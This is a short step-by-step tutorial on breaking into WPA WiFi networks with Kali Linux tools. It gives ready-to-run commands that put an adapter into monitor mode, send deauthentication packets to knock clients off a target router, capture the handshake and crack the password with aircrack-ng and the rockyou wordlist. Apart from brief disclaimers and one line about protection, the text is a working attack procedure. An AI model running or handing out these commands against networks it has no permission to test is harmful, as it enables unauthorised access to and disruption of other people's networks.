WiFi Hacking in Kali Linux
Disclaimer: This guide is strictly for educational and ethical hacking purposes. Unauthorized access to networks is illegal.
Step-by-Step Process
1. Identify Available WiFi Networks
To find available WiFi networks in range, run the following command:
sudo iwlist wlan0 scan | grep ESSID
This command lists all available networks, filtering out only the ESSIDs (WiFi names).
2. Enable Monitor Mode
Before capturing packets, switch your WiFi adapter to monitor mode:
sudo airmon-ng start wlan0
This allows the adapter to capture all packets in the air, not just those meant for your device.
3. Capture WiFi Traffic
Once in monitor mode, capture network traffic and look for handshake packets:
sudo airodump-ng wlan0mon
This command shows available networks, their MAC addresses, and encryption types.
4. Deauthenticate Connected Devices
To force a client to reconnect (capturing the handshake), send deauth packets:
sudo aireplay-ng --deauth 5 -a <MAC_ADDRESS> wlan0mon
Replace <MAC_ADDRESS> with the target router's MAC address.
5. Capture the Handshake
Run airodump-ng again, specifying the target network to capture the handshake:
sudo airodump-ng -c <CHANNEL> --bssid <MAC_ADDRESS> -w handshake wlan0mon
Once a handshake is captured, you can attempt to crack it.
6. Crack the Captured Handshake
Use a dictionary attack to try breaking the WiFi password:
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <MAC_ADDRESS> handshake.cap
This command uses RockYou.txt (a common wordlist) to attempt decryption.
Conclusion
Understanding how attackers target WiFi networks is crucial for protection.
Warning: This is for security research and educational purposes only. Unauthorized hacking is illegal.